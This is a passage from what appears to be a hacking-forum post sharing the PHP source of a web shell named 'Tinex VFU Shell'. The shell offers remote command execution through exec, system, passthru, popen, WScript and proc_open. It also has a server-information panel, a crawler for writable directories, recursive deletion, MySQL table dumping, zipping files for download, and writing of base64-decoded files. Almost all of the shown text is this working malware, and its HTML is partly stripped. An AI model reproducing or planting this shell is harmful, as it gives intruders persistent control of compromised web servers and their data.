'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p('

'); makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); if ($command) { p('
');        if ($execfunc=='wscript' && IS_WIN && IS_COM) {            $wsh = new COM('WScript.shell');            $exec = $wsh->exec('cmd.exe /c '.$command);            $stdout = $exec->StdOut();            $stroutput = $stdout->ReadAll();            echo $stroutput;        } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {            $descriptorspec = array(               0 => array('pipe', 'r'),               1 => array('pipe', 'w'),               2 => array('pipe', 'w')            );            $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);            if (is_resource($process)) {                fwrite($pipes[0], $command."\r\n");                fwrite($pipes[0], "exit\r\n");                fclose($pipes[0]);                while (!feof($pipes[1])) {                    echo fgets($pipes[1], 1024);                }                fclose($pipes[1]);                while (!feof($pipes[2])) {                    echo fgets($pipes[2], 1024);                }                fclose($pipes[2]);                proc_close($process);            }        } else {            echo(execute($command));        }        p('
'); }}//end shellelseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a'.$hp[$a].' »'); p('
    '); if ($a==0) { for($i=1;$i'.$info[$i][0].':'.$info[$i][1].''); } } elseif ($a == 1) { for($i=10;$i'.$info[$i][0].':'.$info[$i][1].''); } } p('
'); }}//end phpenvelse { m('Undefined Action');}?>
<?php debuginfo();ob_end_flush();?> Copyright © 2012-2013 -
This is the hidden content, please
Is Not My Own Shell I'm Just The Developer.
<?php/*======================================================Show info shell======================================================*/function m($msg) { echo '
'; echo $msg; echo '
';}function scookie($key, $value, $life = 0, $prefix = 1) { global $admin, $timestamp, $_SERVER; $key = ($prefix ? $admin['cookiepre'] : '').$key; $life = $life ? $life : $admin['cookielife']; $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);}function multi($num, $perpage, $curpage, $tablename) { $multipage = ''; if($num > $perpage) { $page = 10; $offset = 5; $pages = @ceil($num / $perpage); if($page > $pages) { $from = 1; $to = $pages; } else { $from = $curpage - $offset; $to = $curpage + $page - $offset - 1; if($from $pages) { $from = $curpage - $pages + $to; $to = $pages; if(($to - $from) 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); for($i = $from; $i ['.$i.'] '; } $multipage .= ($curpage Next' : '').($to Last' : ''); $multipage = $multipage ? '

Pages: '.$multipage.'

' : ''; } return $multipage;}// Login pagefunction loginpage() {?> .::[ Tinex VFU Shell ]::.

 

 

 

 


<?phpecho "".$err_mess."";?>
<?php exit;}//end loginpage()function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res;}function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr);}function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); }}// Debugfunction debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo 'Processed in '.$totaltime.' second(s)';}// Function connect databasefunction dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') { if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) { p('

Can not connect to MySQL server

'); exit; } if($link && $dbname) { if (!@mysql_select_db($dbname, $link)) { p('

Database selected has error

'); exit; } } if($link && mysql_get_server_info() > '4.1') { if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) { q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); } } return $link;}// Array stripfunction s_array(&$array) { if (is_array($array)) { foreach ($array as $k => $v) { $array[$k] = s_array($v); } } else if (is_string($array)) { $array = stripslashes($array); } return $array;}// HTML Stripfunction html_clean($content) { $content = htmlspecialchars($content); $content = str_replace("\n", "

", $content); $content = str_replace(" ", "  ", $content); $content = str_replace("\t", "    ", $content); return $content;}// Chmodfunction getChmod($filepath){ return substr(base_convert(@fileperms($filepath),10,8),-4);}function getPerms($filepath) { $mode = @fileperms($filepath); if (($mode & 0xC000) === 0xC000) {$type = 's';} elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} elseif (($mode & 0x8000) === 0x8000) {$type = '-';} elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} else {$type = '?';} $owner['read'] = ($mode & 00400) ? 'r' : '-'; $owner['write'] = ($mode & 00200) ? 'w' : '-'; $owner['execute'] = ($mode & 00100) ? 'x' : '-'; $group['read'] = ($mode & 00040) ? 'r' : '-'; $group['write'] = ($mode & 00020) ? 'w' : '-'; $group['execute'] = ($mode & 00010) ? 'x' : '-'; $world['read'] = ($mode & 00004) ? 'r' : '-'; $world['write'] = ($mode & 00002) ? 'w' : '-'; $world['execute'] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];}function getUser($filepath) { if (function_exists('posix_getpwuid')) { $array = @posix_getpwuid(@fileowner($filepath)); if ($array && is_array($array)) { return ' / '.$array['name'].''; } } return '';}// Delete dirfunction deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { @chmod($deldir.'/'.$file,0777); deltree($deldir.'/'.$file); } if (is_file($deldir.'/'.$file)) { @chmod($deldir.'/'.$file,0777); @unlink($deldir.'/'.$file); } } $mydir->close(); @chmod($deldir,0777); return @rmdir($deldir) ? 1 : 0;}// Backgroundfunction bg() { global $bgc; return ($bgc++%2==0) ? 'alt1' : 'alt2';}// Get pathfunction getPath($scriptpath, $nowpath) { if ($nowpath == '.') { $nowpath = $scriptpath; } $nowpath = str_replace('\\', '/', $nowpath); $nowpath = str_replace('//', '/', $nowpath); if (substr($nowpath, -1) != '/') { $nowpath = $nowpath.'/'; } return $nowpath;}// Get up pathfunction getUpPath($nowpath) { $pathdb = explode('/', $nowpath); $num = count($pathdb); if ($num > 2) { unset($pathdb[$num-1],$pathdb[$num-2]); } $uppath = implode('/', $pathdb).'/'; $uppath = str_replace('//', '/', $uppath); return $uppath;}// Configfunction getcfg($varname) { $result = get_cfg_var($varname); if ($result == 0) { return 'No'; } elseif ($result == 1) { return 'Yes'; } else { return $result; }}// Function namefunction getfun($funName) { return (false !== function_exists($funName)) ? 'Yes' : 'No';}function GetList($dir){ global $dirdata,$j,$nowpath; !$j && $j=1; if ($dh = opendir($dir)) { while ($file = readdir($dh)) { $f=str_replace('//','/',$dir.'/'.$file); if($file!='.' && $file!='..' && is_dir($f)){ if (is_writable($f)) { $dirdata[$j]['filename']=str_replace($nowpath,'',$f); $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); $dirdata[$j]['dirchmod']=getChmod($f); $dirdata[$j]['dirperm']=getPerms($f); $dirdata[$j]['dirlink']=ue($dir); $dirdata[$j]['server_link']=$f; $dirdata[$j]['client_link']=ue($f); $j++; } GetList($f); } } closedir($dh); clearstatcache(); return $dirdata; } else { return array(); }}function qy($sql) { //echo $sql.'

'; $res = $error = ''; if(!$res = @mysql_query($sql)) { return 0; } else if(is_resource($res)) { return 1; } else { return 2; } return 0;}function q($sql) { return @mysql_query($sql);}function fr($qy){ mysql_free_result($qy);}function sizecount($size) { if($size > 1073741824) { $size = round($size / 1073741824 * 100) / 100 . ' G'; } elseif($size > 1048576) { $size = round($size / 1048576 * 100) / 100 . ' M'; } elseif($size > 1024) { $size = round($size / 1024 * 100) / 100 . ' K'; } else { $size = $size . ' B'; } return $size;}// Zipclass PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//File list foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, 'r'); $content = @fread ($fd, filesize($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } // Show file list function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while ($file = readdir($dh)) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] > 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; }}// Dump mysqlfunction sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = q("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } fr($fields); $keys = q("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" && $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } fr($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = q("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter');}function tbfoot(){ p('

');}function makehide($name,$value=''){ p("");}function makeinput($arg = array()){ $arg['size'] = $arg['size'] > 0 ? "size=\"$arg\"" : "size=\"100\""; $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; !$arg['type'] && $arg['type'] = 'text'; $arg['title'] = $arg['title'] ? $arg['title'].'

' : ''; $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; if ($arg['newline']) { p("

$arg[title]

"); } else { p("$arg[title]"); }}function makeselect($arg = array()){ if ($arg['onchange']) { $onchange = 'onchange="'.$arg['onchange'].'"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ($arg['newline']) p('

'); p("$arg[title] "); if ($arg['newline']) p('

');}function formhead($arg = array()) { !$arg['method'] && $arg['method'] = 'post'; !$arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; !$arg['name'] && $arg['name'] = 'form1'; p("
"); if ($arg['title']) { p('

'.$arg['title'].' »

'); }}function maketext($arg = array()){ !$arg['cols'] && $arg['cols'] = 100; !$arg['rows'] && $arg['rows'] = 25; $arg['title'] = $arg['title'] ? $arg['title'].'

' : ''; p("

$arg[title]

");}function formfooter($name = ''){ !$name && $name = 'submit'; p('

'); p('
');}function formfoot(){ p('');}// Exitfunction pr($a) { echo '
';    print_r($a);    echo '
';}?>[/LENGUAJE][/HIDE-THANKS]
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.